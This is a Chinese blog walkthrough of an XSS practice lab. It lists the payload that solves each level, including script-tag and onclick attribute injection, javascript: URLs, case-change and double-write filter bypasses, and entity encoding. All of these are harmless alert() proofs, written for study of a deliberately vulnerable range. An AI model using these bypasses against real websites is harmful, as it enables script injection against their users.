漏洞复现篇——XSS靶场小游戏

环境安装:

把安装包解压到www目录下即可

开始闯关:

游戏开始页面,点击图片进入第一关

在这里插入图片描述

level1——

这一关将test改成<script>alert(/xxx/)</script>即可

在这里插入图片描述
通关页面
在这里插入图片描述

level2——"οnclick="alert(/xxx/)

这一关要查看源代码

在这里插入图片描述
找到test的位置,发现第二处有突破口
在这里插入图片描述
输入"onclick="alert(/xxx/)然后点击页面即可

在这里插入图片描述

level3——'οnclick='alert(/xxx/)

这一关把双引号改成了单引号所以输入'onclick='alert(/xxx/)即可

在这里插入图片描述

level4——"οnclick="alert(/xxx/)

这一关与第二关一样"onclick="alert(/xxx/)
在这里插入图片描述

level5——"><a href=" javascript:alert(1)"

用a标签如:"><a href=" javascript:alert(1)"
在这里插入图片描述

level6——"Onclick="alert(1)

将O大写即可绕过如:"Onclick="alert(1)
在这里插入图片描述

level7——"oonnclick="alert(1)

用双写绕过,如:"oonnclick="alert(1)
在这里插入图片描述

level8——javascript:alert(1)

javascript:alert(1)进行实体编码绕过,如:&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;
在这里插入图片描述

level9——javascr ipt:alert(1)//http://

这里限制了网址格式并且过滤了script,所以要伪装一下,如:javascr ipt:alert(1)//http://

在这里插入图片描述

level10——!&t_sort=" type=“text” οnclick="alert(1)

自己添加一个弹框,如:!&t_sort=" type="text" onclick="alert(1)
在这里插入图片描述

level11——

页面没有突破口,先看源码吧,发现什么了么?都有隐藏属性,但是ref好像是Referer
在这里插入图片描述
那我们来抓包看看,发现没有Referer字段,那我们就添加一个
在这里插入图片描述

  • 8
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值